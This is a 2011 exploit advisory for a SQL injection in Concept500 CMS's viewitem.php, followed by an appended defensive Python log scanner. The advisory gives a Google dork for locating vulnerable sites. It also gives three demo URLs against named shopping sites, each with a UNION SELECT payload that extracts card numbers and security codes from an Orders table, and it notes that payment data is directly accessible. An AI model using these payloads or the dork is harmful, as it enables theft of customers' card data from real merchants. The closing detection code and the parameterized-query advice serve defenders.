Concept500 CMS suffers from a remote SQL injection vulnerability.
# Exploit Title: Concept500 CMS SQL Injection Vulnerability
# Google Dork: [inurl : inurl:viewItem.php?id= ]
# Date: 2011-07-08
# Author: Sepehr Security Team
# Discovered By: H3X
# Software Site: https://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Expl0it :]
https://www.[sitename].com/viewitem.php?id=[SQL Injection]
[DEMO:]
1) https://www.mycommissionbid.com/bid/viewitem.php?id=-487+union+select+1,group_concat%28SecurityNo,0x3a,CardNo%29,3,4,5,6,7,8,9,10,11+from+Orders--
2) https://www.historicflyingclothing.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
3) https://www.hiscoll.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
and more ...
[Note :]
With this vulnerability you can get direct access to payment information, such as PayPal and other card information, in the database.
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Spc. Thanks :]
thE_Knight | Einstein | W!z4rd | Naboodgar | CONS7ANTINE | Mr.Amir-Masoud| nImaarek | GrEEn-ErRor | Net.Plus | Cruel
All Sepehr Security Team Members And All Iranian Hack3rs
[Home Page :]
wWw.Sepehr-Team.orG
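
For defenders reviewing web server logs from a site running this CMS, the following added example (not part of the original advisory) flags requests to viewitem.php whose id parameter is not a plain integer, which is the pattern shown in the [DEMO] requests. The log entries, IP addresses, table and column names, and the function names check_line and scan are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL keywords that have no place in a numeric item id.
SQL_TOKENS = re.compile(r"\b(union|select|group_concat|from)\b", re.I)

# Constructed sample entries (documentation IP ranges, invented table/column names).
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Jul/2011:10:00:00 +0000] "GET /viewitem.php?id=10055 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [08/Jul/2011:10:00:04 +0000] "GET /bid/viewitem.php'
    '?id=-487+union+select+1,group_concat%28a,0x3a,b%29,3+from+t-- HTTP/1.1" 200 734',
    '203.0.113.7 - - [08/Jul/2011:10:00:09 +0000] "GET /viewitem.php?id=12%27 HTTP/1.1" 500 0',
    '192.0.2.10 - - [08/Jul/2011:10:00:12 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900',
]

def check_line(line):
    """Return None for a clean entry, else (decoded_id, reason)."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    # Match viewitem.php and viewItem.php in any directory.
    if not url.path.lower().endswith("/viewitem.php"):
        return None
    # parse_qs percent-decodes the value and turns '+' into a space,
    # so the keyword match runs on what the application actually receives.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"\d{1,10}", value):
            continue  # legitimate item id
        reason = "sql-keywords" if SQL_TOKENS.search(value) else "non-numeric-id"
        return value, reason
    return None

def scan(lines):
    """Return (line_number, decoded_id, reason) for every flagged entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = check_line(line)
        if result:
            hits.append((n, *result))
    return hits

if __name__ == "__main__":
    for n, value, reason in scan(SAMPLE_LOG):
        print(f"line {n}: {reason}: id={value!r}")
```

The same integer-only rule belongs in the application itself: validate id as an integer and pass it to the database through a parameterized query.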